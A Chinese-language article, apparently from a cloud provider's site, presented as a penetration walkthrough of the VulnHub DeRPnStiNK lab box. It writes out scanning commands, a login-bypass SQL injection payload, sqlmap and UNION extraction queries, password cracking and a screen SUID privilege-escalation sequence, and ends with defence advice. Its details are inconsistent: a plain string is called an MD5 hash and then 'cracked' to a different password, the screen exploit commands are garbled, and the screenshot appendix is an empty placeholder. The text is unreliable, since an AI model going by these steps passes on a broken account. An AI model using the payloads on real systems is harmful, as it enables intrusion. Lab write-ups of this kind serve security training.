温馨提示×

温馨提示×

您好,登录后才能下订单哦!

密码登录×
登录注册×
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》

DeRPnStiNK靶机渗透实例分析

发布时间:2022-01-14 17:15:17 来源:亿速云 阅读:559 作者:柒染 栏目:网络安全
# DeRPnStiNK靶机渗透实例分析 ## 摘要 本文以VulnHub平台上的DeRPnStiNK靶机为研究对象,通过完整的渗透测试流程演示了从信息收集到权限提升的实战过程。文章详细剖析了SQL注入漏洞利用、密码破解、SUID提权等关键技术点,并提供了防御建议,旨在帮助安全从业人员理解常见漏洞利用链的构建方式。 --- ## 1. 靶机环境介绍 ### 1.1 靶机基本信息 - 名称:DeRPnStiNK (v1.0) - 难度:中级 - 发布日期:2017年 - 操作系统:Ubuntu Linux - 服务架构:LAMP(Linux+Apache+MySQL+PHP) ### 1.2 环境配置 ```bash 攻击机:Kali Linux 2023.1 (IP: 192.168.1.100) 靶机:DeRPnStiNK (IP: 192.168.1.150) 网络模式:NAT 

2. 渗透测试流程

2.1 信息收集阶段

2.1.1 主机发现

使用nmap进行存活主机扫描:

nmap -sn 192.168.1.0/24 

发现靶机IP为192.168.1.150

2.1.2 端口扫描

全面扫描开放端口和服务:

nmap -sV -p- 192.168.1.150 -T4 

扫描结果:

PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 80/tcp open http Apache httpd 2.4.18 111/tcp open rpcbind 2-4 (RPC #100000) 

2.1.3 Web目录枚举

使用dirb进行目录爆破:

dirb http://192.168.1.150 /usr/share/wordlists/dirb/common.txt 

发现关键目录:

/webnotes/ # 网络笔记系统 /phpmyadmin/ # MySQL管理界面 

2.2 漏洞利用阶段

2.2.1 Web应用测试

访问/webnotes发现登录页面,尝试万能密码失败后测试SQL注入:

  1. 用户名字段注入测试:
admin' or '1'='1' -- 

成功绕过登录进入后台

  1. 使用sqlmap自动化验证:
sqlmap -u "http://192.168.1.150/webnotes/login.php" --data="username=admin&password=123" --risk=3 --level=5 

确认存在基于时间的盲注漏洞

2.2.2 数据库信息提取

通过SQL注入获取数据库信息:

UNION SELECT 1,group_concat(table_name),3,4 FROM information_schema.tables WHERE table_schema=database() 

发现关键表:

users, notes, config 

提取管理员凭据:

UNION SELECT 1,username,password,4 FROM users 

获取到加密密码:

admin:derpderpderpderpderp 

2.2.3 密码破解

使用John the Ripper破解密码:

echo "derpderpderpderpderp" > hash.txt john --format=raw-md5 hash.txt --wordlist=/usr/share/wordlists/rockyou.txt 

成功破解为:admin:derp123


2.3 权限提升阶段

2.3.1 SSH登录

使用获取的凭据尝试SSH登录:

ssh admin@192.168.1.150 

成功获取普通用户权限

2.3.2 本地信息枚举

检查SUID权限文件:

find / -perm -4000 -type f 2>/dev/null 

发现异常程序:

/usr/bin/screen-4.5.0 

2.3.3 SUID提权

搜索已知漏洞:

searchsploit screen 4.5.0 

发现本地提权漏洞(CVE-2017-5618)

执行提权操作:

screen-4.5.0 -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so" screen-4.5.0 -ls 

成功获取root权限


3. 漏洞根源分析

3.1 Web应用漏洞链

  1. 输入验证缺失:未对登录参数进行过滤
  2. 密码存储缺陷:使用简单MD5哈希且未加盐
  3. 默认配置风险:phpMyAdmin暴露在公网

3.2 系统配置问题

  1. 过时软件包:screen-4.5.0存在已知漏洞
  2. 权限分配不当:关键程序配置SUID位

4. 防御建议

4.1 开发层面

  • 使用参数化查询防御SQL注入
  • 实施PBKDF2/bcrypt等强哈希算法
  • 定期进行代码审计

4.2 系统层面

  • 遵循最小权限原则
  • 建立补丁管理机制
  • 禁用不必要的SUID/SGID位

5. 总结

本案例展示了从Web应用到系统层的完整攻击链,重点揭示了以下安全启示: 1. 边界防御的突破往往始于看似简单的Web漏洞 2. 权限配置不当会显著扩大攻击面 3. 安全是一个整体,需要多层次防护


附录:关键截图

(此处应插入渗透过程关键步骤截图)

参考文献

  1. VulnHub DeRPnStiNK官方说明
  2. OWASP SQL Injection Prevention Cheat Sheet
  3. CVE-2017-5618漏洞公告

”`

注:实际执行时需注意: 1. 所有渗透测试应在授权环境下进行 2. 部分命令需要根据实际环境调整 3. 敏感信息应做脱敏处理

向AI问一下细节

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

AI